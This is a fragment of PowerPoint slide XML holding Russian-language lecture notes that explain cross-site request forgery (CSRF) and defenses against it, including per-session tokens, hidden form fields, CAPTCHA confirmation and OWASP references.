                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>сси</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и</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6830" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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Же</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тельно</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б</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>авлять</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="2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кен</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ск</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ыт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е</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поле</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тела</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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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запроса, ч</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обы</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избежать</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его использова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н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ия</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URL</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6195" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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Токен</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включать</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URL</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но</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это</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ув</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</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и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>чив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ет</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с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к,</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ч</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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="2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будет</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получен злоумышленником,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-10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ке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</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может</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быт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ь</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с</a:t>
            </a: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dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ьзован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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 ат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ке.</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5560" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="44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имер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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реализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-8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генератора</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сессионных</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кен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6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для</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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под</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зв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нием</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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-4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G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ard</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466090" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>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найти</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на</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сай</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е</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OWASP</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https</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www</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err="1">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owasp</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org</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index</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err="1">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php</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PHP</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_</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CSRF</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_</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Guar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5"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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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6195" algn="just">
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>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11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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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же</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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требова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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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от</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-8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пользователя</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подтверждения</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запроса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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пример</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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помощи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-10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дополнитель</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н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-13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з</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>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ц</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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проведении</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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финансовых</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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транзакций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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или см</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е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ны</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парол</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я</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a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>На сайте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>есть более развёрнутый перечень технологий защиты от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1050782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Подделка межсайтовых запросов (CSRF/XSRF) - это атака, которая заставляет конечного пользователя выполнять нежелательные действия в веб-приложении, в котором он в настоящее время аутентифицирован. Атаки CSRF нацелены именно на запросы, изменяющие состояние, а не на кражу данных, поскольку у атакующего нет возможности увидеть ответ на поддельный запрос.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>Как предотвратить? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="73660" marR="36195" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>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ед</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вра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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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уникальн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ы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>м</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токеном</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каждом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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е</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r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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Такие</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токены должны</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быть</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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уни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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>альными</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как</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минимум</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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для</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каждой</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е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>сси</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и</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6830" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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Же</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тельно</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б</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>авлять</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="2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кен</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ск</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ыт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е</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поле</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тела</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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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запроса, ч</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обы</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избежать</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его использова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н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ия</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URL</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6195" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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Токен</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включать</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URL</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но</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это</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ув</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</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и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>чив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ет</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с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к,</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ч</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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="2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будет</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получен злоумышленником,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-10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ке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</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может</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быт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ь</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с</a:t>
            </a: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dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ьзован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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 ат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ке.</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5560" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="44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имер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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реализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-8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генератора</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сессионных</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кен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6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для</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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под</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зв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нием</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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-4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G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ard</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466090" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>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найти</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на</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сай</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е</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OWASP</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https</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www</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err="1">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owasp</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org</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index</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err="1">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php</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PHP</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_</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CSRF</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_</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Guar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5"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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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6195" algn="just">
              <a:lnSpc>
                <a:spcPct val="97000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>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11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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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же</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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требова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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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от</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-8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пользователя</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подтверждения</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запроса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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пример</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-9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помощи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-10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дополнитель</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н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-13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з</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>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ц</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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проведении</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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финансовых</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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транзакций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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или см</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е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ны</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парол</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я</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a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>На сайте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>есть более развёрнутый перечень технологий защиты от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289603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Подделка межсайтовых запросов (CSRF/XSRF) - это атака, которая заставляет конечного пользователя выполнять нежелательные действия в веб-приложении, в котором он в настоящее время аутентифицирован. Атаки CSRF нацелены именно на запросы, изменяющие состояние, а не на кражу данных, поскольку у атакующего нет возможности увидеть ответ на поддельный запрос.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>Как предотвратить? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="73660" marR="36195" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>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ед</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вра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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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уникальн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ы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>м</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токеном</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каждом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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е</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r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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Такие</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токены должны</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быть</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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уни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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>альными</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как</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минимум</a:t>
            </a:r>
            <a:r>
